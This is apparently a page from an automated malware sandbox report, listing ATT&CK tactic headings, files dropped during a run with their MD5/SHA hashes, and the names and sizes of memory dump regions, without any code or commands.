T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_21708db8-17dd-468d-b330-031cf7ec53a2

MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
5f5473d6481a39747f80cd1231fee582

SHA1
ab1be5cceb9fefdd9a68806e6c136884f12106f9

SHA256
f28d28ed90218abc984f6462883d51141ecf88bdff96949626fb3d2cabf6d60c

SHA512
3d2f85e3f751e627b23de6255303d1eee3a0183106e1915b1501fc759fe66d41377c5882b3ea62e48fc79ed97aa2afe4ae3ab13d89cfd02d159314fb0cc62990

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
6a4692d95527e74b5a17bbbe6a08aafd

SHA1
a5451668253da9601e0c467dea5e3672452410d3

SHA256
7665af08c77d905084fcecb66ca37c91aa8c9b42f1b59125cdc962270a9f1ad5

SHA512
199a5e835d5bc5a0d9fe6fc4be482fe0652046ea95b5434b8b8b147d14203f1aa41655fb97bdc87b5f293ed407f0efbf32c5499e65358a0b4ea9d4b4aa318124

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
6a4692d95527e74b5a17bbbe6a08aafd

SHA1
a5451668253da9601e0c467dea5e3672452410d3

SHA256
7665af08c77d905084fcecb66ca37c91aa8c9b42f1b59125cdc962270a9f1ad5

SHA512
199a5e835d5bc5a0d9fe6fc4be482fe0652046ea95b5434b8b8b147d14203f1aa41655fb97bdc87b5f293ed407f0efbf32c5499e65358a0b4ea9d4b4aa318124

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
235eda5864863389e40b2fe712a6192d

SHA1
1ba4dedbfb1f1c37265fb572efba8a213385e4d9

SHA256
4c5ef0e357a794e7b06f1f268c6037129348e951d2e71b7a327bacb2aef4633d

SHA512
054ee205af843800647b2f9cb0b8011d0c47ef58845c5d5ef36a45bbc03d454c499e32e9631360179a44eba6a05e93b255d03a645cf0e02f5b8f7b498d51ea86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
b36ce8f8d83cb412f8d060cefbbb2f3e

SHA1
b9560226a6d151f3f24d0eaed202e72107ee2c2c

SHA256
e42e9d1198e46e6c1e85cc6f94db1a0ff88ada9658f6491d6785fe042102287a

SHA512
e7e62725c389f38009055300990d8165437a242ba5272a81bd87f4c7269429bf6217bf28a850b39996cfc7106db1e2fc5ff8ed928394932a3bd363153c567959

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
761d2d706e0805611f66ca31c791165f

SHA1
2392b3a3b0d2dde54647ff7c5be55e14d4913b14

SHA256
837ee629905e6e32893c363ca5ce79bb8d95f073a61b523c76936ee7aa1c616a

SHA512
c90b7ed2419ac34baf2fcf2c4bfce1088e6d5f6d74c15569b8fb8cb49da4c70c7978d762973567ca6d22f3f84459958d40a5466e31f11212f1840d25da9f2d6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
15379afa7a74393567518181adb73523

SHA1
7f89f4b85cd7dce360ec0653f930ffddd7e222d3

SHA256
d35485e7634e3d785024505fe7b071ef048b9a689452cfe978b06da615bee498

SHA512
00d74e2498a431bed966cff8ee91738590c5e5c48c8d82c82506e91cb9bcb97d7e839d8a50a1cd9bb3575915df3fa070b8902c0c0abc86363f8c281890a0bac6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
245b7b623e8eca569702abf3d777fe21

SHA1
e60e800a03ccba35e048bdf548001c858e578850

SHA256
224c14dd7ef68c835967bf3219933d05dc24805d9d3796713fe8b4d33bfe7011

SHA512
97dc988f6b06760399929f35aea64816eb64dfb8270096b2e97f118322d238a88663231dc8ee2e64be98ae750fc54df8ae003299225edfa505a2bf4c6807244a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
b122e44c3ca90927313ed7fb3b26dfde

SHA1
048507e4b0ccefe5640c965cf15405347367424e

SHA256
7c99cc467b9e12b601d8c962de3ac6ae7319c6913e968e3075994cb3eadd1a0d

SHA512
8af3b4a45ba4f394957d727b356508e8f8c16371047763bcbdd0e6a509b16589c56fd213d6137f353a2c28a9a5b4d40f87420a5ad833cd695ac631e9f50ab8a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
49acf4c81dc2b802b4923bc517a993b8

SHA1
2a0c9cac0d803705cf01ce7fa79c19f647a262a2

SHA256
1919a77aa60330dbb368496222725474b6be0c1cc3d9e48a787d6632aae2ca78

SHA512
600381420035e8a80b0fdc2f3f6965520921f84fed98c83eda8b7e5b55f0e4e0e595073f4fd5028ab34dcc7dfad0e0fd639575f12f5f93fc1c18752d73516523

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
fc55dfeb5267c2b80894b82be007015d

SHA1
8dff99b45a6cb8a01b95960db0df7d2ff639398b

SHA256
7d542e11730ca637cfa4dab57505c8dbd60ca8d305ce7777a6e99bb919926fff

SHA512
f6530e8759d0f01b30c6c2285d2a1d4c188b8f922d3ed03546aecc38f0449c4cfd432414d029e783aa47def3082bc9b10be10e0e92f507b7f29be110e6c56b0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
94f58bf5325b263387304b93eb78c2ca

SHA1
40a3528f3f16fb1d41a128eb2bca5238ad82d737

SHA256
75a908676399d5388b41c6634b8be0ecc7b1aa007589e6f0be6ab2df71a1ab67

SHA512
7b10f61d4b5ae6137f144f62cb833783d6f1a31768f393b96323d8711e2ec10ea522271358b50e3170e2e87956ad8f1ab2db9b958f73c1f85362efe55756d40e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
7e5fd7b3ebca270e6a7e39c75c259b8c

SHA1
efff6f4e846929b89bf8e82185aa3179ea7d30d4

SHA256
ac94176f678029ba48c7e3b9794cec1f6bc11848ac0e94115a44e3ced213001d

SHA512
39cea4a34a3066a5a979f90bae11d339c0ba1c4a808cdf95788f6264dbc90adc886e2a919f1d0c15a01380c5da9ec15e809c5abe5cd180101e927b4d7fdd49cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
7e5fd7b3ebca270e6a7e39c75c259b8c

SHA1
efff6f4e846929b89bf8e82185aa3179ea7d30d4

SHA256
ac94176f678029ba48c7e3b9794cec1f6bc11848ac0e94115a44e3ced213001d

SHA512
39cea4a34a3066a5a979f90bae11d339c0ba1c4a808cdf95788f6264dbc90adc886e2a919f1d0c15a01380c5da9ec15e809c5abe5cd180101e927b4d7fdd49cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3092.bat

MD5
1af2c796c268a8160d0d93e8866dc7b0

SHA1
6d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f

SHA256
94e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8

SHA512
af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e

Download Submit
C:\Users\Admin\AppData\Local\Temp\v.txt

MD5
e794afac752b5eb7e452b45223094562

SHA1
4a78d0c1492c6c0a08e93f1cfcc21803bfddf569

SHA256
45a5439a5b7ccb6552cbab644ef736a82dc687fdd684fabedbc66695b0872879

SHA512
8a80604075d1a62f6bc56605c404ce9ff9e5c95505e64c223ffcd69b6ef5c325d7b5b8fc0fed9b14d958f1cba1514b9e42e2937dfb9ade46a69a128c593d0bd4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
0ef086261ba0fdc2ba8927fe1953e11d

SHA1
d72826e0d8b1f0250662c6e4fab5f0eccfc96b79

SHA256
0fa92933e52e79b51434cfc0603de39b1b498482b5174eb39515d8be118be9d2

SHA512
34d76aca029b9a8a14c801e2f75e12bacff5f2fc8568d9c834f0d974baf7069efea65fba391b3d1dd3075bfccabe1c1988ae6b427b914715e1b8b1b1be936f23

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
0ef086261ba0fdc2ba8927fe1953e11d

SHA1
d72826e0d8b1f0250662c6e4fab5f0eccfc96b79

SHA256
0fa92933e52e79b51434cfc0603de39b1b498482b5174eb39515d8be118be9d2

SHA512
34d76aca029b9a8a14c801e2f75e12bacff5f2fc8568d9c834f0d974baf7069efea65fba391b3d1dd3075bfccabe1c1988ae6b427b914715e1b8b1b1be936f23

Download Submit
memory/276-167-0x0000000000000000-mapping.dmp

Download
memory/280-60-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/280-62-0x000000001AD50000-0x000000001AD52000-memory.dmp

Filesize
8KB

Download
memory/328-176-0x0000000000000000-mapping.dmp

Download
memory/328-129-0x0000000000000000-mapping.dmp

Download
memory/428-152-0x0000000000000000-mapping.dmp

Download
memory/428-139-0x0000000000000000-mapping.dmp

Download
memory/480-177-0x0000000000000000-mapping.dmp

Download
memory/532-189-0x0000000000000000-mapping.dmp

Download
memory/576-153-0x0000000000000000-mapping.dmp

Download
memory/580-179-0x0000000000000000-mapping.dmp

Download
memory/852-154-0x0000000000000000-mapping.dmp

Download
memory/900-180-0x0000000000000000-mapping.dmp

Download
memory/900-137-0x0000000000000000-mapping.dmp

Download
memory/916-149-0x0000000000000000-mapping.dmp

Download
memory/920-187-0x0000000000000000-mapping.dmp

Download
memory/944-135-0x0000000000000000-mapping.dmp

Download
memory/944-171-0x0000000000000000-mapping.dmp

Download
memory/964-159-0x0000000000000000-mapping.dmp

Download
memory/976-172-0x0000000000000000-mapping.dmp

Download
memory/980-162-0x0000000000000000-mapping.dmp

Download
memory/1000-181-0x0000000000000000-mapping.dmp

Download
memory/1060-155-0x0000000000000000-mapping.dmp

Download
memory/1072-144-0x0000000000000000-mapping.dmp

Download
memory/1084-160-0x0000000000000000-mapping.dmp

Download
memory/1084-138-0x0000000000000000-mapping.dmp

Download
memory/1088-148-0x0000000000000000-mapping.dmp

Download
memory/1092-142-0x0000000000000000-mapping.dmp

Download
memory/1144-145-0x0000000000000000-mapping.dmp

Download
memory/1188-164-0x0000000000000000-mapping.dmp

Download
memory/1300-69-0x000000001AD90000-0x000000001AD91000-memory.dmp

Filesize
4KB

Download
memory/1300-65-0x000007FEFB561000-0x000007FEFB563000-memory.dmp

Filesize
8KB

Download
memory/1300-72-0x0000000001FF0000-0x0000000001FF1000-memory.dmp

Filesize
4KB

Download
memory/1300-78-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/1300-165-0x0000000000000000-mapping.dmp

Download
memory/1300-75-0x000000001AD14000-0x000000001AD16000-memory.dmp

Filesize
8KB

Download
memory/1300-63-0x0000000000000000-mapping.dmp

Download
memory/1300-68-0x0000000001F10000-0x0000000001F11000-memory.dmp

Filesize
4KB

Download
memory/1300-74-0x000000001AD10000-0x000000001AD12000-memory.dmp

Filesize
8KB

Download
memory/1404-182-0x0000000000000000-mapping.dmp

Download
memory/1480-131-0x0000000000000000-mapping.dmp

Download
memory/1484-188-0x0000000000000000-mapping.dmp

Download
memory/1496-158-0x0000000000000000-mapping.dmp

Download
memory/1524-143-0x0000000000000000-mapping.dmp

Download
memory/1572-133-0x0000000000000000-mapping.dmp

Download
memory/1576-169-0x0000000000000000-mapping.dmp

Download
memory/1592-161-0x0000000000000000-mapping.dmp

Download
memory/1608-156-0x0000000000000000-mapping.dmp

Download
memory/1616-192-0x0000000000000000-mapping.dmp

Download
memory/1616-151-0x0000000000000000-mapping.dmp

Download
memory/1620-130-0x0000000000000000-mapping.dmp

Download
memory/1640-168-0x0000000000000000-mapping.dmp

Download
memory/1660-190-0x0000000000000000-mapping.dmp

Download
memory/1680-175-0x0000000000000000-mapping.dmp

Download
memory/1684-134-0x0000000000000000-mapping.dmp

Download
memory/1692-150-0x0000000000000000-mapping.dmp

Download
memory/1732-136-0x0000000000000000-mapping.dmp

Download
memory/1760-132-0x0000000000000000-mapping.dmp

Download
memory/1760-174-0x0000000000000000-mapping.dmp

Download
memory/1772-141-0x0000000000000000-mapping.dmp

Download
memory/1772-183-0x0000000000000000-mapping.dmp

Download
memory/1776-195-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/1776-200-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/1776-196-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/1776-199-0x000000001ABA4000-0x000000001ABA6000-memory.dmp

Filesize
8KB

Download
memory/1776-170-0x0000000000000000-mapping.dmp

Download
memory/1776-197-0x00000000023F0000-0x00000000023F1000-memory.dmp

Filesize
4KB

Download
memory/1776-198-0x000000001ABA0000-0x000000001ABA2000-memory.dmp

Filesize
8KB

Download
memory/1784-76-0x0000000002610000-0x0000000002612000-memory.dmp

Filesize
8KB

Download
memory/1784-90-0x000000001B540000-0x000000001B541000-memory.dmp

Filesize
4KB

Download
memory/1784-117-0x0000000002900000-0x0000000002901000-memory.dmp

Filesize
4KB

Download
memory/1784-87-0x000000001B510000-0x000000001B511000-memory.dmp

Filesize
4KB

Download
memory/1784-118-0x000000001AB00000-0x000000001AB01000-memory.dmp

Filesize
4KB

Download
memory/1784-77-0x0000000002614000-0x0000000002616000-memory.dmp

Filesize
8KB

Download
memory/1784-64-0x0000000000000000-mapping.dmp

Download
memory/1796-184-0x0000000000000000-mapping.dmp

Download
memory/1800-163-0x0000000000000000-mapping.dmp

Download
memory/1804-185-0x0000000000000000-mapping.dmp

Download
memory/1812-191-0x0000000000000000-mapping.dmp

Download
memory/1816-146-0x0000000000000000-mapping.dmp

Download
memory/1844-186-0x0000000000000000-mapping.dmp

Download
memory/1944-157-0x0000000000000000-mapping.dmp

Download
memory/1972-173-0x0000000000000000-mapping.dmp

Download
memory/1976-166-0x0000000000000000-mapping.dmp

Download
memory/1988-178-0x0000000000000000-mapping.dmp

Download